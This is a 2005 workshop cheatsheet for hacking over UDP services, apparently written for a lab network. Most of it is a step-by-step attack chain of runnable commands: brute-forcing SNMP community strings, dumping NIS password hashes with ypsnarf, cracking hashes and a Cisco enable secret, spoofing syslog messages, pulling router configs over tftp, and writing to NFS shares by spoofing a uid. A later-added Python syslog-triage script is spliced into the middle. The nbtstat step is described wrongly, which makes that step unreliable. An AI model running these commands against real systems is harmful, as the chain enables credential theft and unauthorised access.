Hacking without TCP Checklist

Hacking without TCP by Chuck Willis (chuck at securityfoundry dot com)

Bring Your Own Laptop Cheatsheet / Checklist

IT Underground – Prague – 18 February 2005

Slides and other information available at www.securityfoundry.com

  • Add a route through my laptop to the targets:

route add -net 192.168.243.0 netmask 255.255.255.0 gw (my_ip) eth0

  • Use nmap to scan for live systems and UDP services (keep the port list short; UDP scans are slow)

nmap -sU -sV -v -v -p 7,13,53,111,161,389,2049 192.168.243.0/24

  • Use Netcat to connect to the simple services

nc -un hostname port

  • Use DNS reverse lookups to get hostnames

host ip_to_lookup server_ip

  • Use guess.sh or hydra to guess the SNMP community string

./hydra ip_address snmp -P file.txt

  • Use snmp to get more port information

snmpwalk -c community_string hostname > tmpfile

./guess.sh "snmpwalk -c " filename " ip_address"

  • Connect to the NIS server and get password hashes

./ypsnarf ip_address domain_name passwd.byname > filename

  • Guess NIS passwords with John

./john filename

  • Connect to the XDMCP server and log in with a NIS username and password

Xnest -query ip_address :1

  • Create Syslog Message

echo "<8>itunderground rulez!" > syslogfile.txt

  • Send spoofed messages to the Syslog Daemons

hping2 ip_address -2 -s 514 -p 514 -d 25 -E syslogfile.txt -c 1 -a 1.2.3.4
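The two syslog steps above rely on the fact that UDP/514 collectors accept any datagram whose payload starts with a PRI field (`<facility*8 + severity>`) and cannot verify the source address. The added example below (not from the talk) shows the collector-side check a defender would want: decode the PRI, and flag datagrams from addresses outside the expected sender ranges or with a malformed PRI. The sample datagrams and the allowed-sender list are constructed for the example.

```python
import ipaddress
import re

# Standard syslog facility and severity names, indexed by their numeric codes.
FACILITIES = ["kern", "user", "mail", "daemon", "auth", "syslog", "lpr", "news",
              "uucp", "cron", "authpriv", "ftp", "ntp", "audit", "alert", "clock",
              "local0", "local1", "local2", "local3", "local4", "local5", "local6", "local7"]
SEVERITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]

# PRI is one to three digits in angle brackets at the very start of the datagram.
PRI_RE = re.compile(r"^<(\d{1,3})>(.*)$", re.S)


def decode_pri(message):
    """Return (facility_name, severity_name, body), or None if the PRI is missing/out of range."""
    m = PRI_RE.match(message)
    if not m:
        return None
    pri = int(m.group(1))
    if pri > 191:            # 23*8 + 7 is the largest legal PRI value
        return None
    facility, severity = divmod(pri, 8)
    return FACILITIES[facility], SEVERITIES[severity], m.group(2)


def triage(records, allowed_senders):
    """records: iterable of (src_ip, raw_datagram). Returns a list of alert strings."""
    allowed = [ipaddress.ip_network(n) for n in allowed_senders]
    alerts = []
    for src, raw in records:
        if not any(ipaddress.ip_address(src) in net for net in allowed):
            alerts.append(f"unexpected sender {src}: {raw!r}")   # UDP source is unauthenticated
        decoded = decode_pri(raw)
        if decoded is None:
            alerts.append(f"malformed PRI from {src}: {raw!r}")
            continue
        facility, severity, body = decoded
        if severity == "emerg":                                   # <8> = user.emerg, as in the checklist
            alerts.append(f"{facility}.{severity} from {src}: {body!r}")
    return alerts


# Constructed sample datagrams as a UDP/514 collector would see them: (source address, payload).
SAMPLE = [
    ("192.168.243.10", "<30>sshd[1234]: Accepted publickey for alice"),
    ("1.2.3.4", "<8>itunderground rulez!"),
    ("10.0.0.5", "no pri here"),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE, ["192.168.243.0/24"]):
        print(alert)
```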

  • Get router configuration files from the tftp server (create file of possible names)

./guess.sh "tftp ip_address -c get " filename ""

  • Guess Router Enable Password with John

echo 'test:$1$....' > cisco.txt (where $1$... is the enable secret hash from the router configuration file; single quotes keep the shell from expanding $1)

./john cisco.txt

  • Read and write files on the NFS servers

nfs

nfs> host ip_address (connects)

nfs> dump (gets list of shared directories)

nfs> mount -U /dir/name

nfs> ls

nfs> get filename

nfs> ls -l

drwxr-xr-x 2 500 0 4096 Dec 20 21:58 .

drwxr-xr-x 2 500 0 4096 Dec 20 21:58 ..

-rw-r--r-- 1 0 0 5 Dec 20 21:51 asdf.txt

nfs> uid 500

nfs> put filename

  • Connect to the Windows RPC port using nbtstat to see endpoints

nbtstat ip_address